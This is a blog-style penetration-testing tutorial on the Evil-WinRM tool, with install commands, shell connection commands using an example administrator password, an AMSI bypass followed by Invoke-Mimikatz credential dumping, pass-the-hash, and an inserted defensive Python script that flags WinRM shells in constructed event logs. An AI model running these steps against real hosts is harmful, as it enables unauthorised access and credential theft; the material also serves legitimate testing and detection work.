In this post we discuss Evil-WinRM, the best-known tool for getting a remote PowerShell shell over WinRM (Windows Remote Management). It is an open-source tool, available on GitHub, built for WinRM penetration testing.
Table of Contents
· Evil-winrm
· Features
· Installation
· Load PowerShell scripts
· Pass the Hash
· Install using its Docker image
Evil-winrm
This program can be used against any Microsoft Windows server with WinRM enabled (by default on TCP port 5985 for HTTP and 5986 for HTTPS), but only if you already have credentials and permission to use the service, so it belongs in the post-exploitation phase of a pentest. Its purpose is to provide convenient, easy-to-use features for offensive work. System administrators can use it for legitimate purposes as well, but most of its features are focused on hacking/pentesting.
Features
§ Compatible with Linux and Windows client systems
§ Load PowerShell scripts in memory
§ Load DLL files in memory, bypassing some AVs
§ Load C# assemblies in memory, bypassing some AVs
§ Load x64 payloads generated with the donut technique
§ AMSI Bypass
§ Pass-the-hash support
§ Kerberos auth support
§ SSL and certificates support
§ Upload and download files showing progress bar
§ List remote machine services without privileges
§ Command History
§ WinRM command completion
§ Local files completion
§ Colorization on prompt and output messages (can be disabled optionally)
§ Docker support (prebuilt images available at Dockerhub)
§ Trap capturing to avoid accidental shell exit on Ctrl+C
Installation
In this post we cover two easy ways to install evil-winrm on Kali Linux; more installation methods are described on its GitHub page.
The Ruby gem installs evil-winrm directly and pulls in all of its dependencies automatically:
gem install evil-winrm
Once it is installed, run evil-winrm with no arguments to print its help text, which shows the syntax and the options for running evil-winrm against the Windows Remote Management service.
Now we use evil-winrm to get a shell on the remote machine by connecting to its WinRM service on port 5985. On success it drops us into a PowerShell prompt on the victim, as shown below.
Syntax: evil-winrm -i <IP> -u <username> -p '<password>'
evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'
Besides the shell itself, evil-winrm provides a menu command that lists its loaded helper functions, such as Invoke-Binary, Dll-Loader, Donut-Loader and Bypass-4MSI.
Suppose we keep some pentesting PowerShell scripts in /root/powershell on the attacking machine; evil-winrm can load these .ps1 scripts into the remote session in memory.
The scripts must be in the directory given with the -s argument, and evil-winrm is then run as follows:
Syntax: evil-winrm -i <IP> -u <username> -p '<password>' -s <scripts path>
evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell
Type menu again to see the loaded functions, run Bypass-4MSI first so that AMSI does not block the script when it is loaded, then load and invoke the script. Here we load the Invoke-Mimikatz PowerShell script to dump stored credentials.
menu
Bypass-4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz
As a result, it has dumped the credentials stored on the Windows Server. 😈
Evil-winrm also supports pass-the-hash: if you have the user's NTLM hash but not the password, supply the hash with the -H option in place of -p, and it authenticates with the hash and gives you the same shell on the host machine.
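What the credentialed shell above and the pass-the-hash connection look like from the defender's side, as an added example that is not part of the original post or of the Evil-WinRM project: a Python script that picks a WinRM shell out of Windows Security 4624 (logon) and Sysmon 1 (process-create) events. The event dicts are constructed and only modelled on the real event fields. It assumes, as a fact about Windows rather than something the post states, that commands typed into a remote PowerShell session are spawned by wsmprovhost.exe and that the session is recorded as a network logon (LogonType 3). An NTLM network logon with no interactive logon is what a pass-the-hash connection leaves, but every other NTLM network logon (SMB, for example) looks the same at this level, so that flag is a lead, not proof.

```python
"""
Added example, not from the original post or the Evil-WinRM project:
host-side detection of a WinRM shell such as Evil-WinRM.

The events below are constructed dicts modelled on Windows Security
event 4624 (logon) and Sysmon event 1 (process create); they are not
real logs. Assumed facts: a remote PowerShell/WinRM session arrives as a
network logon (LogonType 3) and the commands it runs are spawned by
wsmprovhost.exe; a pass-the-hash session authenticates with NTLM, but so
does any other NTLM network logon, so that flag is a lead, not proof.
"""
from collections import defaultdict
from typing import Dict, Iterable, List

WSMPROVHOST = r"c:\windows\system32\wsmprovhost.exe"

# Constructed sample events (not real logs).
SAMPLE_EVENTS: List[Dict] = [
    # Network logon over NTLM: what an evil-winrm -p or -H connection leaves.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "administrator", "IpAddress": "192.168.1.10"},
    # Interactive console logon: not WinRM.
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "Negotiate",
     "TargetUserName": "bob", "IpAddress": "-"},
    # Command run inside the remote PowerShell session.
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "Image": r"C:\Windows\System32\whoami.exe", "User": r"WIN\administrator",
     "CommandLine": "whoami"},
    # Ordinary desktop activity: not WinRM.
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "User": r"WIN\bob",
     "CommandLine": "notepad"},
    # Kerberos network logon (for example evil-winrm with a Kerberos realm).
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "svc_backup", "IpAddress": "192.168.1.20"},
]


def _user(name: str) -> str:
    """Normalise 'DOMAIN\\user' or 'user' to lower-case 'user' for joining."""
    return name.rsplit("\\", 1)[-1].lower()


def network_logons(events: Iterable[Dict]) -> List[Dict]:
    """Security 4624 events with LogonType 3 (network), the type WinRM uses."""
    return [e for e in events
            if e.get("EventID") == 4624 and e.get("LogonType") == 3]


def wsmprovhost_children(events: Iterable[Dict]) -> List[Dict]:
    """Sysmon 1 events whose parent is the WinRM plugin host wsmprovhost.exe."""
    return [e for e in events
            if e.get("EventID") == 1
            and e.get("ParentImage", "").lower() == WSMPROVHOST]


def summarize(events: Iterable[Dict]) -> Dict[str, Dict]:
    """Join network logons and wsmprovhost-spawned commands per user.

    Returns {user: {"ntlm_network_logon": bool, "sources": [...],
                    "commands": [...]}}. A user with commands under
    wsmprovhost.exe has an active remote shell; NTLM with no interactive
    logon is the pattern a pass-the-hash connection leaves.
    """
    events = list(events)
    out: Dict[str, Dict] = defaultdict(
        lambda: {"ntlm_network_logon": False, "sources": [], "commands": []})
    for e in network_logons(events):
        u = _user(e["TargetUserName"])
        out[u]["sources"].append(e.get("IpAddress", "-"))
        if e.get("AuthenticationPackageName") == "NTLM":
            out[u]["ntlm_network_logon"] = True
    for e in wsmprovhost_children(events):
        out[_user(e["User"])]["commands"].append(e["CommandLine"])
    return dict(out)


if __name__ == "__main__":
    for user, info in summarize(SAMPLE_EVENTS).items():
        print(user, info)
```

Run it with python3 and it prints one line per user that logged on over the network: administrator shows an NTLM network logon from 192.168.1.10 plus a whoami spawned by wsmprovhost.exe, which is the shell from the commands above; svc_backup shows a Kerberos network logon and no commands; bob, who only logged on at the console, does not appear. A Kerberos session (evil-winrm's Kerberos support) shows up with AuthenticationPackageName Kerberos, so the wsmprovhost.exe parent is the more reliable signal of a shell, and the NTLM flag only narrows down which sessions deserve a credential check.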
Install using its Docker image
This is a very easy and convenient way to run evil-winrm on the attacking machine: Docker pulls the prebuilt image from Docker Hub and the container connects to the victim's WinRM service in the same step. Only the following command is needed.
docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'